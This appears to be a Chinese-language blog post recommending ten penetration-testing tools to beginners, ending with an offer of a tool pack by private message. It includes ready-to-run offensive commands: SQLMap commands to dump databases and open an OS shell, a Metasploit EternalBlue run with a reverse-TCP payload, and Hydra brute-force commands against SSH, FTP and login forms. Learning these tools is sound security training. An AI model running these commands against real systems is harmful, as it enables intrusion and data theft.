做网络安全,工具就是你的武器。
一把好刀能让你在战场上事半功倍,一套好工具能让你在渗透测试中如虎添翼。
但新手最头疼的就是:工具太多了,到底该用哪个?
今天这篇文章,我从自己用过的上百个网安工具里,精选出10个新手必装的神器。每一个都是我日常高频使用、经过实战检验的好东西。尤其是第3个,用过的人都说封神。
建议先收藏,再慢慢装。
第1个:Nmap —— 信息收集的"望远镜"
一句话介绍:网络扫描之王,渗透测试第一步必用工具。
Nmap(Network Mapper)是网络安全领域最著名的端口扫描工具,没有之一。它可以帮你探测目标主机是否在线、开放了哪些端口、跑的是什么服务、甚至操作系统是什么版本。
新手必学命令:
# 基础扫描(扫描目标开放端口)nmap192.168.1.1# 扫描指定端口nmap-p80,443,3306192.168.1.1# 全端口扫描(1-65535)nmap -p-192.168.1.1# 服务版本探测(看端口后面跑的是什么软件、什么版本)nmap-sV192.168.1.1# 操作系统探测nmap-O192.168.1.1# 综合扫描(常用参数组合,一步到位)nmap-sS-sV-O-p-192.168.1.1为什么新手必装:信息收集是渗透测试的第一步,而Nmap是信息收集阶段最核心的工具。你后面学的每一个漏洞利用,前提都是先用Nmap找到目标开放了什么服务。
第2个:Burp Suite —— Web安全的"瑞士军刀"
一句话介绍:Web渗透测试必备神器,抓包改包重放一把梭。
如果说Web安全只能装一个工具,那一定是Burp Suite。它是目前最流行的Web应用安全测试工具,功能强大到离谱:拦截请求、修改参数、重放攻击、漏洞扫描、爬虫、暴力破解……几乎你能想到的Web测试功能它都有。
新手最常用的4个模块:
| 模块 | 功能 | 使用场景 |
|---|---|---|
| Proxy(代理) | 拦截和修改HTTP请求 | 抓包看请求内容、修改参数测试 |
| Repeater(重放器) | 重放和修改请求 | 手动测试漏洞、反复调整Payload |
| Intruder(入侵者) | 自动化攻击 | 暴力破解、模糊测试、批量探测 |
| Decoder(解码器) | 编码解码转换 | Base64、URL编码、Hex等转换 |
新手入门操作:
- 浏览器安装SwitchyOmega插件,设置代理为127.0.0.1:8080
- 打开Burp Suite,Proxy模块开启拦截
- 浏览器访问任意网站,Burp就能抓到请求
- 右键发送到Repeater,就可以改参数重放了
为什么新手必装:做Web安全,你80%的时间都在和HTTP请求打交道。Burp Suite就是你和HTTP之间的桥梁,不会用Burp,等于Web安全还没入门。
第3个:Kali Linux —— 渗透测试的"军火库"
一句话介绍:预装了600+安全工具的操作系统,网安人的标配系统。
来了,就是这个,第3个,直接封神。
Kali Linux是基于Debian的Linux发行版,专门为数字取证和渗透测试而设计。它最牛的地方在于:预装了600多个安全工具,从信息收集到漏洞利用、从密码破解到无线攻击、从社会工程学到逆向工程,应有尽有。
你不需要一个个去下载安装工具,装完Kali,所有工具都在里面了,开箱即用。
Kali里最常用的工具分类:
信息收集:nmap、whois、dig、theHarvester 漏洞分析:searchsploit、nikto、sqlmap Web应用:burpsuite、dirb、wpscan 密码攻击:hydra、john、hashcat、crunch 无线攻击:aircrack-ng、reaver 逆向工程:ghidra、radare2 取证工具:autopsy、binwalk、foremost 社会工程学:setoolkit、msfvenom新手安装建议:
- 不要直接装物理机,先用VMware虚拟机装,玩熟了再说
- 内存至少分配4G,硬盘至少50G
- 装完第一件事:改root密码、更新源、装中文输入法
- 快照功能一定要用!搞坏了直接回滚,不用重装
为什么说它封神:一个操作系统,把网安领域90%的工具都给你预装好了,而且全部免费、持续更新。你不需要花时间找工具、配环境,打开就能开始学习和实战。对于新手来说,Kali就是最好的起点,没有之一。
第4个:SQLMap —— SQL注入的"自动化收割机"
一句话介绍:SQL注入自动化利用神器,一条命令拖库不是梦。
SQLMap是一个开源的SQL注入自动化工具,它可以自动检测SQL注入漏洞、自动选择注入技术、自动获取数据库数据,甚至直接拿到服务器权限。
新手必学命令:
# 检测是否存在SQL注入sqlmap-u"http://target.com/news.php?id=1"# 获取所有数据库名sqlmap-u"http://target.com/news.php?id=1"--dbs# 获取指定数据库的所有表名sqlmap-u"http://target.com/news.php?id=1"-Ddatabase_name--tables# 获取指定表的所有列名sqlmap-u"http://target.com/news.php?id=1"-Ddatabase_name-Ttable_name--columns# 导出指定字段的数据sqlmap-u"http://target.com/news.php?id=1"-Ddatabase_name-Ttable_name-Cusername,password--dump# 一键获取所有数据(拖库)sqlmap-u"http://target.com/news.php?id=1"--dump-all# 尝试获取操作系统Shellsqlmap-u"http://target.com/news.php?id=1"--os-shell为什么新手必装:SQL注入是Web安全最经典、最常见的漏洞类型,也是新手入门必学的漏洞。SQLMap能帮你把注入过程自动化,让你专注于理解注入原理,而不是手写字节流。但记住:工具是辅助,原理才是根本,一定要先理解SQL注入的原理,再用SQLMap。
第5个:Metasploit —— 漏洞利用的"乐高积木"
一句话介绍:全球最流行的渗透测试框架,漏洞利用模块多到用不完。
Metasploit Framework(简称MSF)是一个开源的渗透测试框架,它内置了大量的漏洞利用模块、Payload生成器、辅助扫描模块。你可以把它理解成一个漏洞利用的"乐高积木"——选择目标漏洞、选择Payload、设置参数,然后一键执行。
新手必学操作:
# 启动Metasploit控制台msfconsole# 搜索漏洞利用模块(以永恒之蓝为例)search ms17_010# 使用指定模块use exploit/windows/smb/ms17_010_eternalblue# 查看模块需要设置的参数show options# 设置目标IPsetRHOSTS192.168.1.100# 设置Payload(反弹Shell)setPAYLOAD windows/x64/meterpreter/reverse_tcp# 设置本机IP(接收反弹连接)setLHOST192.168.1.50# 执行攻击exploit为什么新手必装:MSF是内网渗透和主机漏洞利用的核心工具。学会用MSF,你就能复现各种经典漏洞(永恒之蓝、心脏滴血等),理解漏洞利用的完整流程。而且MSF的Meterpreter是最强大的后渗透工具之一,拿到Shell之后的操作几乎全靠它。
第6个:Wireshark —— 网络流量的"显微镜"
一句话介绍:最强大的网络协议分析器,抓包分析流量的神器。
Wireshark是一个免费开源的网络协议分析器,它可以捕获网络中的数据包,并把数据包的内容详细展示出来。小到TCP三次握手,大到HTTP完整请求,Wireshark都能给你拆解得明明白白。
新手常用功能:
抓包过滤:只抓你想看的流量 - host 192.168.1.100 只抓指定IP的流量 - port 80 只抓80端口的流量 - tcp 只抓TCP协议 - http 只抓HTTP协议 显示过滤:抓完后筛选想看的内容 - ip.addr == 192.168.1.100 - tcp.port == 443 - http.request.method == "POST" 右键追踪流:查看完整的TCP/HTTP会话内容为什么新手必装:学网络安全,不懂网络协议等于空中楼阁。Wireshark能让你"看到"网络流量的真实样子,帮你直观理解TCP/IP、HTTP、DNS等协议的工作原理。而且在应急响应和流量分析中,Wireshark是排查攻击痕迹的核心工具。
第7个:Hydra —— 密码爆破的"攻城锤"
一句话介绍:支持50+协议的在线密码爆破工具,弱口令检测必备。
Hydra(九头蛇)是一个并行化的登录密码爆破工具,支持几乎所有常见的网络协议:SSH、FTP、SMB、RDP、MySQL、HTTP表单、Redis……只要是需要用户名密码登录的服务,Hydra几乎都能爆破。
新手必学命令:
# 爆破SSHhydra-Luser.txt-Ppass.txt ssh://192.168.1.100# 爆破FTPhydra-Luser.txt-Ppass.txt ftp://192.168.1.100# 爆破MySQLhydra-Luser.txt-Ppass.txt mysql://192.168.1.100# 爆破HTTP POST登录表单hydra-Luser.txt-Ppass.txt192.168.1.100 http-post-form"/login.php:user=^USER^&pass=^PASS^:F=失败"# 指定线程数(速度更快)hydra-Luser.txt-Ppass.txt-t16ssh://192.168.1.100为什么新手必装:弱口令是内网渗透中最常见、成功率最高的攻击方式之一。很多服务器的SSH、数据库、后台管理系统都在用弱口令(123456、admin、password等)。学会用Hydra爆破弱口令,你在内网中就能快速横向移动。当然,只能在授权环境下使用,未经授权的爆破是违法行为。
第8个:Dirsearch —— 目录扫描的"探路者"
一句话介绍:高速Web目录扫描工具,帮你找到网站隐藏的路径和文件。
Dirsearch是一个用Python写的Web目录扫描工具,它可以通过字典暴力枚举网站的目录和文件,帮你发现后台管理页面、备份文件、配置文件、测试页面等"隐藏"的路径。
新手必学命令:
# 基础扫描python3 dirsearch.py-uhttp://target.com# 指定字典python3 dirsearch.py-uhttp://target.com-w/path/to/dict.txt# 指定扩展名(扫描.php .html .bak等后缀)python3 dirsearch.py-uhttp://target.com-ephp,html,bak,zip# 递归扫描(扫描到目录后继续深入)python3 dirsearch.py-uhttp://target.com-r# 指定线程数python3 dirsearch.py-uhttp://target.com-t50# 排除指定状态码python3 dirsearch.py-uhttp://target.com-x404,403为什么新手必装:做Web渗透,信息收集阶段除了端口和服务,Web目录和文件也是重点。很多网站的后台、phpinfo、备份文件、.git泄露都是通过目录扫描发现的。Dirsearch速度快、支持递归、可定制性强,是目录扫描的首选工具。
第9个:SearchSploit —— 漏洞利用的"搜索引擎"
一句话介绍:Exploit-DB的本地搜索工具,找POC和EXP一键搞定。
SearchSploit是Kali自带的一个命令行工具,它把Exploit-DB(全球最大的漏洞利用代码库)的所有内容存在本地,你可以直接在终端搜索漏洞利用代码,不用打开浏览器翻网页。
新手必学命令:
# 搜索漏洞利用代码searchsploit eternalblue# 搜索特定软件和版本searchsploit apache2.4.49# 只搜索标题(更精确)searchsploit-t"sql injection"# 查看漏洞利用代码的详细信息searchsploit-x12345# 复制漏洞利用代码到当前目录searchsploit-m12345# 更新漏洞库searchsploit-u为什么新手必装:做漏洞复现和渗透测试,你经常需要找某个漏洞的POC或EXP。SearchSploit让你在终端里就能快速搜索和复制漏洞利用代码,效率比浏览器高得多。而且它是离线的,没有网络也能用。
第10个:Notion / 语雀 —— 知识管理的"第二大脑"
一句话介绍:不是安全工具,但比任何安全工具都重要。
最后一个,我不放工具,放一个笔记软件。
很多新手会问:学网安需要记笔记吗?我的回答是:不但要记,而且要系统地记。
网安知识点多而杂,工具命令、漏洞原理、操作步骤、踩坑经验……如果你不记笔记,学了就忘,等于白学。
我推荐用Notion或者语雀来做知识管理,建立自己的网安知识库:
📁 网络安全知识库 ├── 📁 基础知识 │ ├── 计算机网络 │ ├── Linux命令 │ ├── Windows基础 │ └── MySQL数据库 ├── 📁 Web安全 │ ├── SQL注入 │ ├── XSS跨站脚本 │ ├── 文件上传漏洞 │ ├── 文件包含漏洞 │ └── 命令执行漏洞 ├── 📁 工具使用 │ ├── Nmap │ ├── Burp Suite │ ├── SQLMap │ └── Metasploit ├── 📁 漏洞复现 │ ├── 永恒之蓝MS17-010 │ ├── Log4j漏洞 │ └── 各类CVE复现 └── 📁 学习笔记 ├── 每日学习记录 ├── 踩坑经验汇总 └── 面试题整理为什么新手必装:好记性不如烂笔头。每学一个知识点、每复现一个漏洞、每踩一个坑,都记下来。半年后回头看,你会拥有一个属于自己的、独一无二的网安知识库。这比任何教程都值钱,因为它是你亲手实践过的。
结尾
以上10个工具,是我从新手一路走来到现在,每天都在用的核心工具。
最后说一句心里话:工具是手段,不是目的。不要为了学工具而学工具,工具是用来解决问题的。先理解原理,再用工具提效,这才是正确的顺序。
把这10个工具用熟,你已经超过了80%的网安新手。剩下的,就是持续学习和不断实战了。
我把这10个工具的安装包、配置教程、常用命令速查表全部整理好了,还有一份《网安工具大全PDF》,包含50+常用工具的详细使用说明。
需要的朋友,私信我,打包发给你。